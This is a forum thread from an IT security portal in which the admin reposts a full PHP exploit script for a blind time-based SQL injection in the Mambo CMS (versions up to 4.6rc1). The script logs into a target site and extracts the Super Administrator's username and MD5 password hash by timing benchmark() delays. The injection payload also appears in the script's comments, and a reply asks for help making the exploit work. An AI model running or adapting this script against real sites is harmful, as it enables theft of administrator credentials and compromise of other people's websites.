Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 28, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 646
Members: 0
Total: 646
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Mambo -> Mambo <= 4.6rc1 sql injection
Post new topic  Reply to topic View previous topic :: View next topic 
Mambo <= 4.6rc1 sql injection
PostPosted: Mon Jun 19, 2006 12:47 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Found from http://www.securityfocus.com/archive/1/437496

Code:

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentials\r\n";

echo "disclosure exploit (benchmark() vesion)\r\n";

echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";

echo "site: http://retrogod.altervista.org\r\n";

echo "this is called the Sun-Tzu 'trascendental guru meditation' tecnique\r\n\r\n";

if ($argc<5) {

echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";

echo "host: target server (ip/hostname)\r\n";

echo "path: path to Mambo\r\n";

echo "user/pass: you need an account\r\n";

echo "Options:\r\n";

echo " -T[prefix] specify a table prefix different from 'mos_'\r\n";

echo " -p[port]: specify a port other than 80\r\n";

echo " -P[ip:port]: specify a proxy\r\n";

echo "Example:\r\n";

echo "php ".$argv[0]." localhost /mambo/ username password\r\n";

die;

}

/*

explaination:

sql injection in "title" argument when you submit a web link, poc:

start mysql daemon with log option...

>mysqld --log=mambo.txt

now login, go to "Submit Weblink" feature, in "Name: " field type:

99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(200000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*

in mambo.txt we have:

13 Query SELECT id FROM mos_weblinks

WHERE title='99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*' AND catid='2'

injection is blind but, as you can see, we can you use time delays through Mysql

benchmark() function to ask questions about tables

this works regardless of magic_quotes_gpc settings

*/

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

function quick_dump($string)

{

$result='';$exa='';$cont=0;

for ($i=0; $i<=strlen($string)-1; $i++)

{

if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

{$result.=" .";}

else

{$result.=" ".$string[$i];}

if (strlen(dechex(ord($string[$i])))==2)

{$exa.=" ".dechex(ord($string[$i]));}

else

{$exa.=" 0".dechex(ord($string[$i]));}

$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}

}

return $exa."\r\n".$result;

}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)

{

global $proxy, $host, $port, $html, $proxy_regex;

if ($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if (!$ock) {

echo 'No response from '.$host.':'.$port; die;

}

}

else {

$c = preg_match($proxy_regex,$proxy);

if (!$c) {

echo 'Not a valid proxy...';die;

}

$parts=explode(':',$proxy);

echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";

$ock=fsockopen($parts[0],$parts[1]);

if (!$ock) {

echo 'No response from proxy...';die;

}

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

}

else {

$html='';

while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

$html.=fread($ock,1);

}

}

fclose($ock);

#debug

#echo "\r\n".$html;

}

function is_hash($hash)

{

if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}

else {return false;}

}

$host=$argv[1];

$path=$argv[2];

$user=$argv[3];

$pass=$argv[4];

$port=80;

$prefix="mos_";

$proxy="";

for ($i=5; $i<=$argc-1; $i++){

$temp=$argv[$i][0].$argv[$i][1];

if ($temp=="-p")

{

$port=str_replace("-p","",$argv[$i]);

}

if ($temp=="-P")

{

$proxy=str_replace("-P","",$argv[$i]);

}

if ($temp=="-T")

{

$prefix=str_replace("-T","",$argv[$i]);

}

}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}

if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data ="username=".$user;

$data.="&passwd=".$pass;

$data.="&remember=yes";

$data.="&option=login";

$data.="&Submit=login";

$data.="&op2=login";

$data.="?=english";

$data.="&return=".urlencode("http://".$host.$path);

$data.="&message=0";

$packet ="POST ".$p." HTTP/1.0\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Accept: text/plain\r\n";

$packet.="Connection: Close\r\n";

$packet.="Content-Type: application/x-www-form-urlencoded\r\n";

$packet.="Content-Length: ".strlen($data)."\r\n\r\n";

$packet.=$data;

sendpacketii($packet);

$temp=explode("Set-Cookie: ",$html);

$cookie="";

for ($i=1; $i<=count($temp)-1; $i++)

{

$temp2=explode(" ",$temp[$i]);

$cookie.=" ".$temp2[0];

}

if ((strstr($cookie,"=+;")) | $cookie=="") {die("Unable to login...");}

else

{

echo "Done...\r\ncookie -> ".$cookie."\r\n";

}

$j=1;$admin="";

while (!strstr($admin,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

$starttime=time();

$sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(username,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";

echo "\r\n".$sql."\r\n";

$sql=urlencode($sql);

$data ="title=".$sql;

$data.="&catid=2";

$data.="&url=http://www.google.com";

$data.="&description=";

$data.="&id=0";

$data.="&option=com_weblinks";

$data.="&task=save";

$data.="&ordering=0";

$data.="&approved=0";

$data.="&Returnid=0";

$packet ="POST ".$p."index.php HTTP/1.0\r\n";

$packet.="User-Agent: Googlebot/2.1\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Accept: text/plain\r\n";

$packet.="Connection: Close\r\n";

$packet.="Content-Type: application/x-www-form-urlencoded\r\n";

$packet.="Cookie: ".$cookie."\r\n";

$packet.="Content-Length: ".strlen($data)."\r\n\r\n";

$packet.=$data;

//debug

//echo quick_dump($packet)."\r\n";

sendpacketii($packet);

$endtime=time();

echo "endtime -> ".$endtime."\r\n";

$difftime=$endtime - $starttime;

echo "difftime -> ".$difftime."\r\n";

if ($difftime > 7) {$admin.=chr($i);echo "admin -> ".$admin."[???]\r\n";sleep(2);break;} //more than seven seconds? we succeed...

if ($i==255) {die("Exploit failed...");}

}

$j++;

}

$md5s[0]=0;//null

$md5s=array_merge($md5s,range(48,57)); //numbers

$md5s=array_merge($md5s,range(97,102));//a-f letters

//print_r(array_values($md5s));

$j=1;$password="";

while (!strstr($password,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

if (in_array($i,$md5s))

{

$starttime=time();

$sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(password,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";

echo "\r\n".$sql."\r\n";

$sql=urlencode($sql);

$data ="title=".$sql;

$data.="&catid=2";

$data.="&url=http://www.google.com";

$data.="&description=";

$data.="&id=0";

$data.="&option=com_weblinks";

$data.="&task=save";

$data.="&ordering=0";

$data.="&approved=0";

$data.="&Returnid=0";

$packet ="POST ".$p."index.php HTTP/1.0\r\n";

$packet.="User-Agent: Googlebot/2.1\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Accept: text/plain\r\n";

$packet.="Connection: Close\r\n";

$packet.="Content-Type: application/x-www-form-urlencoded\r\n";

$packet.="Cookie: ".$cookie."\r\n";

$packet.="Content-Length: ".strlen($data)."\r\n\r\n";

$packet.=$data;

//debug

//echo quick_dump($packet)."\r\n";

sendpacketii($packet);

$endtime=time();

echo "endtime -> ".$endtime."\r\n";

$difftime=$endtime - $starttime;

echo "difftime -> ".$difftime."\r\n";

if ($difftime > 7) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}

}

if ($i==255) {die("Exploit failed...");}

}

$j++;

}

//if you are here...

echo "Exploit succeeded...\r\n";

echo "--------------------------------------------------------------------\r\
n";

echo "admin -> ".$admin."\r\n";

echo "password (md5) -> ".$password."\r\n";

echo "--------------------------------------------------------------------\r\
n";

?>

original url: http://retrogod.altervista.org/mambo_46rc1_sql.html



P.S. Not verified Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Jul 17, 2006 6:43 pm Reply with quote
Vixje
Active user
Active user
 
Joined: Mar 25, 2006
Posts: 35




Hmm i cant get this too work Wink Is there anbody that can help me out, does this one work? I'm not asking u for a step by step guidance hehe, just share your experience with me please Wink
View user's profile Send private message
Mambo <= 4.6rc1 sql injection
  www.waraxe.us Forum Index -> Mambo
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.160 Seconds